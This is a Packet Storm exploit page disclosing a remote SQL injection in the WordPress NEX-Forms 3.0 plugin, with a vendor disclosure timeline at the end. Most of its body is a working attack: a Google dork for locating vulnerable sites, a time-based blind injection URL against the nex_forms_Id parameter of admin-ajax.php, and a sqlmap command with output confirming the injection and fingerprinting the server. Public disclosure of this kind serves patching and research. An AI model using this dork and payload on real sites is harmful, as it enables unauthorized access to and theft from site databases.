what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress NEX-Forms 3.0 SQL Injection

WordPress NEX-Forms 3.0 SQL Injection
Posted Apr 21, 2015
Authored by Claudio Viviani

WordPress NEX-Forms version 3.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | f3d2ee0169a4862b50a26f4db64ebb0dd910007cf1db21e531bf128f5fd07b11

WordPress NEX-Forms 3.0 SQL Injection

Change Mirror Download
######################

# Exploit Title : NEX-Forms 3.0 SQL Injection Vulnerability

# Exploit Author : Claudio Viviani

# Website Author: http://www.homelab.it
http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)


# Vendor Homepage : https://wordpress.org/plugins/nex-forms-express-wp-form-builder/

# Software Link : https://downloads.wordpress.org/plugin/nex-forms-express-wp-form-builder.3.0.zip

# Dork Google: inurl:nex-forms-express-wp-form-builder
# index of nex-forms-express-wp-form-builder

# Date : 2015-03-29

# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox

######################

# Info:

The "submit_nex_form" ajax function is affected from SQL Injection vulnerability

"nex_forms_Id" var is not sanitized

# PoC Exploit:

http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)

# Poc Video:

http://youtu.be/04G08Cbrx1I

# PoC sqlmap:

sqlmap -u "http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10" -p nex_forms_Id --dbms mysql

[23:15:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[23:15:48] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[23:15:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:15:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:16:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[23:16:07] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive
GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 85 HTTP(s) requests:
---
Parameter: nex_forms_Id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE)
---
[23:16:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.3.3, Apache 2.2.3
back-end DBMS: MySQL 5.0.12

######################

# Vulnerability Disclosure Timeline:

2015-03-29: Discovered vulnerability
2015-04-16: Vendor Notification
2015-04-17: Vendor Response/Feedback
2015-04-21: Vendor Send Fix/Patch (same version number)
2015-04-21: Public Disclosure

#####################

Discovered By : Claudio Viviani
http://www.homelab.it
http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
http://ffhd.homelab.it (Free Fuzzy Hashes Database)

info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    14 Files
  • 29
    Jun 29th
    11 Files
  • 30
    Jun 30th
    7 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close